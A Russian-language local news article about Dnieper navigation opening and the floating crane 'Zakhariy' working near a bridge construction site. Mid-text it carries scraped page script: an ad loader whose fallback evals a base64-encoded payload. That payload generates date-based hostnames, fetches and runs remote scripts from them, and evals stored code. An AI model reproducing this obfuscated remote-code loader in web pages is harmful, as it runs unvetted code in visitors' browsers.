С завтрашнего дня, 1 апреля, запускается речная навигация. В этом году в акватории Днепра работает кран «Захарий», поэтому судовладельцам нужно быть внимательными.
По информации ОГА, работа «Захария» зависит от соблюдения гидрометеорологических условий и отсутствия волн вследствие прохождения судов в районе проведения работ.
С этой целью по инициативе облгосадминистрации была разработана схема взаимного информирования при строительстве вантового моста через р. Днепр (в акватории сооружения № 10).
Генподрядной компанией «Онур» был составлен предварительный (ориентировочный) график работ в акватории сооружения № 10.
Сейчас проводятся геологические исследования с целью открытия дополнительного судового хода на р. Днепр для усиления безопасности судоходства при выполнении строительных работ вантового моста. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Всех судовладельцев и судоводителей призывают ответственно отнестись к прохождению судами р. Днепр на территории выполнения строительных работ автотранспортной магистрали через р. Днепр (в акватории сооружения № 10).
Во время движения следовать указаниям диспетчерской службы и сообщениям через систему РОС. В случае создания условий для возникновения опасной ситуации рекомендуем немедленно прекратить движение судов с одновременным уведомлением об этом ответственных диспетчерских и контролирующих служб.
Напомним, как ранее писал «Акцент», инженер подрядной компании рассказал о сложностях работы с плавкраном. По его словам, сам кран неповоротный. Его позиция регулируется с помощью лебедок или буксиров. Поэтому работа довольно кропотливая и требует четкого командования, чтобы не произошло смещения опоры. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/v-oga-opublikovali-grafik-raboty-krana-zahariya-v-akvatorii-dnepra-komu-nuzhno-byt-vnimatelnym/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook